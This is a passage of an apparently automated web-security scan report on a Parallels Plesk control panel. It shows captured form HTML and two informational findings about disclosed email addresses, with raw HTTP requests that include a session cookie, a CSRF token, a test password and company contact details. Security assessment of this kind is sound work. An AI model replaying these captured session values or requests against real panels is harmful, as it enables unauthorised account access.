<span id='general-account-login'>xsscx</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='general-account-language-form-row' class='form-row' >
<div class='field-name'><label for='general-account-language'>Panel language&nbsp;</label></div>
<div class='field-value'>

<select name="general[account][language]" id="general-account-language">
<option value="en-US" label="ENGLISH (United States)" selected="selected">ENGLISH (United States)</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="Hoyt LLC Research" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="+1 339 206 1886" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80">PO BOX 250
</textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="Accord" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="MA" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="02018" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="..land Islands">..land Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create

Issue detail

The following email address was disclosed in the response:

Request

POST /smb/user/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/create
Origin: http://www.nosedivesailing.com:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard
Content-Length: 434

general%5Bvcard%5D%5BcontactName%5D=format-1&general%5Bvcard%5D%5Bemail%5D%5BemailType%5D=internal&general%5Bvcard%5D%5Bemail%5D%5BinternalEmail%5D=format-1&general%5Bvcard%5D%5BroleId%5D=7&general%5Baccount%5D%5Bpassword%5D=thepassword&general%5Baccount%5D%5BpasswordConfirmation%5D=thepassword&general%5Baccount%5D%5BisActive%5D=0&general%5Baccount%5D%5BisActive%5D=1&hidden=&forgery_protection_token=3e86204e9517123c7f585d736d64aa3f&_=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:24:08 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:24:07 GMT
Connection: close
Content-Length: 204

{"formMessages":{"general":{"vcard":{"email":{"internalEmail":{"recordFound":"The e-mail address format-1@nosedivesailing.com already belongs to another user."}}}}},"status":"success","statusMessages":[]}

11.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/2

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/user/edit/id/2 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:34 GMT
Connection: close
Content-Length: 45694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Hoyt LLC Research - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F2' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>Hoyt LLC Research</b></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
